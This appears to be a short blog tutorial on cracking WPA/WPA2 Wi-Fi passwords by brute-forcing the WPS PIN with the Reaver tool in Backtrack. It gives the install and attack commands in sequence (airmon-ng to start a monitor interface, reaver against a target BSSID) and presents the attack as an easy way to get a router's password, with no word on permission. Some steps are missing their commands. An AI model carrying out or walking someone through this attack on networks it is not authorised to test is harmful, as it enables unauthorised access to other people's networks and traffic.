There is a new tool to use with Backtrack called reaver this is a great little tool. Reaver will crack a WPA/WPA2 encrypted router within ten hours. On the reaver page it says four to ten hours. Here is the page http://code.google.com/p/reaver-wps/
Anyone who has ever tried to get the password of a WPA encrypted router knows how hard it can be some times. Having to get a WPA capture then using aircrack or other tools to try and crack the password. Well reaver is a great addition to existing tools.
Reaver takes advantage of a vulnerability in something called Wi-Fi Protected Setup, or WPS. It’s a feature that exists on many routers, intended to provide an easy setup process, and it’s tied to a PIN that’s hard-coded into the device. Reaver exploits a flaw in these PINs and the result is that, with enough time, it can reveal your WPA or WPA2 password. Reaver does not attempt to take on the WPA encryption itself but goes around it using WPS and then displaying the password.
Reaver runs inside of Backtrack or other Linux variations.
1. Download Backtrack and run it inside VMware or burn it to a disk and boot off of it.
2. You will need a USB adapter compatible with Backtrack and that can do packet injecting. Here are Backtrack compatible USB adapters.
3. Start Backtrack and run the following command
4. Then install reaver with the following command
apt-get install reaver
5. We need the Bssid to run reaver so run the following commands
airmon-ng start wlan0
6. Coppy the BSSID and then run the following command.
reaver -i mon0 -b (The BSSID) –vv
Reaver will now run and start a brute force attack against the Pin number of the router. Reaver does not work with all routers only routers that have WPS installed which is around 80% of routers. Also reaver needs a good signal strength to run or it will have problems.
For more information here is the reaver wiki http://code.google.com/p/reaver-wps/w/list